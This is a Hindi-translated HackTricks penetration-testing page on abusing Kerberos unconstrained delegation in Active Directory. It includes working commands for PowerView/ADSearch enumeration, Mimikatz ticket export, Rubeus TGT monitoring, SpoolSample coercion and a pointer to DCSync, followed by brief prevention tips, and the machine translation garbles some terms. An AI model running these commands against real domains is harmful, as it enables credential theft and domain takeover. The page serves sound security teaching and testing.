11 KiB
असंविधानिक डिलीगेशन
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- क्या आप किसी साइबर सुरक्षा कंपनी में काम करते हैं? क्या आप अपनी कंपनी को HackTricks में विज्ञापित देखना चाहते हैं? या क्या आपको PEASS की नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग करने की इच्छा है? सदस्यता योजनाएं की जांच करें!
- The PEASS Family की खोज करें, हमारा विशेष संग्रह NFTs
- आधिकारिक PEASS और HackTricks swag प्राप्त करें
- 💬 Discord समूह या टेलीग्राम समूह में शामिल हों या मुझे Twitter 🐦@carlospolopm** का पालन करें**.
- अपने हैकिंग ट्रिक्स को hacktricks रेपो और hacktricks-cloud रेपो में पीआर जमा करके साझा करें।
असंविधानिक डिलीगेशन
यह एक सुविधा है जिसे डोमेन प्रशासक किसी भी कंप्यूटर में सेट कर सकता है। फिर, जब भी एक उपयोगकर्ता लॉगिन करता है कंप्यूटर पर, उस उपयोगकर्ता के TGT की एक प्रतिलिपि DC द्वारा प्रदान किए गए TGS में भेजी जाएगी और LSASS में मेमोरी में सहेजी जाएगी। इसलिए, यदि आपके पास मशीन पर प्रशासक विशेषाधिकार हैं, तो आप किसी भी मशीन पर टिकट्स को डंप कर सकेंगे और उपयोगकर्ताओं का अनुकरण कर सकेंगे।
तो यदि डोमेन व्यवस्थापक "असंविधानिक डिलीगेशन" सुविधा सक्रिय करके किसी कंप्यूटर में लॉगिन करता है, और आपके पास उस मशीन में स्थानीय प्रशासक विशेषाधिकार हैं, तो आप कहीं भी टिकट को डंप कर सकेंगे और डोमेन व्यवस्थापक का अनुकरण कर सकेंगे (डोमेन प्राइवेसी).
आप इस गुण के साथ कंप्यूटर ऑब्जेक्ट्स ढूंढ सकते हैं जांचकर कि क्या userAccountControl गुण ADS_UF_TRUSTED_FOR_DELEGATION को समावेश करता है। आप इसे एक LDAP फ़िल्टर के साथ कर सकते हैं ' (userAccountControl:1.2.840.113556.1.4.803:=524288) ', जो powerview करता है:
# असंविधानिक कंप्यूटरों की सूची
## Powerview
Get-NetComputer -Unconstrained #DCs हमेशा दिखाई देते हैं लेकिन privesc के लिए उपयोगी नहीं होते हैं
## ADSearch
ADSearch.exe --search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname,operatingsystem
# Mimikatz के साथ टिकट निर्यात करें
privilege::debug
sekurlsa::tickets /export #सिफारिश की जाती है
kerberos::list /export #एक और तरीका
# लॉगिन की निगरानी करें और नए टिकट निर्यात करें
.\Rubeus.exe monitor /targetuser:<username> /interval:10 #नए TGT के लिए हर 10 सेकंड में जांचें
Mimikatz या Rubeus के साथ व्यवस्थापक (या पीड़ित उपयोगकर्ता) का टिकट मेमोरी में लोड करें एक पास द टिकट** के लिए**।
अधिक जानकारी: https://www.harmj0y.net/blog/activedirectory/s4u2pwnage/
ired.team में असंविधानिक डिलीगेशन के बारे में अधिक जानकारी।
प्रमाणीकरण को बलवान बनाएं
यदि एक हमलावर किसी कंप्यूटर को "असंविधानिक डिलीगेशन" के लिए अनुमति देने के लिए सक्षम है, तो वह एक प्रिंट सर्वर को स्वचालित रूप से लॉगिन करने के लिए धोखा दे सकता है और सर्वर की मेमोरी में एक TGT को सहेज सकता है।
फिर, हमलावर उपयोगकर्ता प्रिंट सर्वर कंप्यूटर खाते का अनुकरण करने के लिए एक पास द टिकट हमला कर सकता है।
किसी भी मशीन के खिलाफ प्रिंट सर्वर को लॉगिन करने के लिए आप [**SpoolSample
.\SpoolSample.exe <printmachine> <unconstrinedmachine>
यदि TGT एक डोमेन कंट्रोलर से है, तो आप एक DCSync हमला कर सकते हैं और DC से सभी हैश प्राप्त कर सकते हैं।
इस हमले के बारे में अधिक जानकारी ired.team में।
यहां अन्य तरीके हैं जिनका उपयोग करके प्रमाणीकरण को बलवान बनाने की कोशिश की जा सकती है:
{% content-ref url="printers-spooler-service-abuse.md" %} printers-spooler-service-abuse.md {% endcontent-ref %}
रोकथाम
- विशेष सेवाओं के लिए सीमित डीए/व्यवस्थापक लॉगिन करें
- उच्चाधिकारी खातों के लिए "खाता संवेदनशील है और इसे अधिग्रहण नहीं किया जा सकता" सेट करें।
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- क्या आप किसी साइबर सुरक्षा कंपनी में काम करते हैं? क्या आप अपनी कंपनी को HackTricks में विज्ञापित देखना चाहते हैं? या क्या आपको PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग करने की इच्छा है? सदस्यता योजनाएं की जांच करें!
- खोजें The PEASS Family, हमारा विशेष NFT संग्रह
- प्राप्त करें आधिकारिक PEASS और HackTricks swag
- शामिल हों 💬 Discord समूह या टेलीग्राम समूह या मुझे Twitter 🐦@carlospolopm** का पालन करें।**
- अपने हैकिंग ट्रिक्स साझा करें, hacktricks रेपो और hacktricks-cloud रेपो में पीआर जमा करके।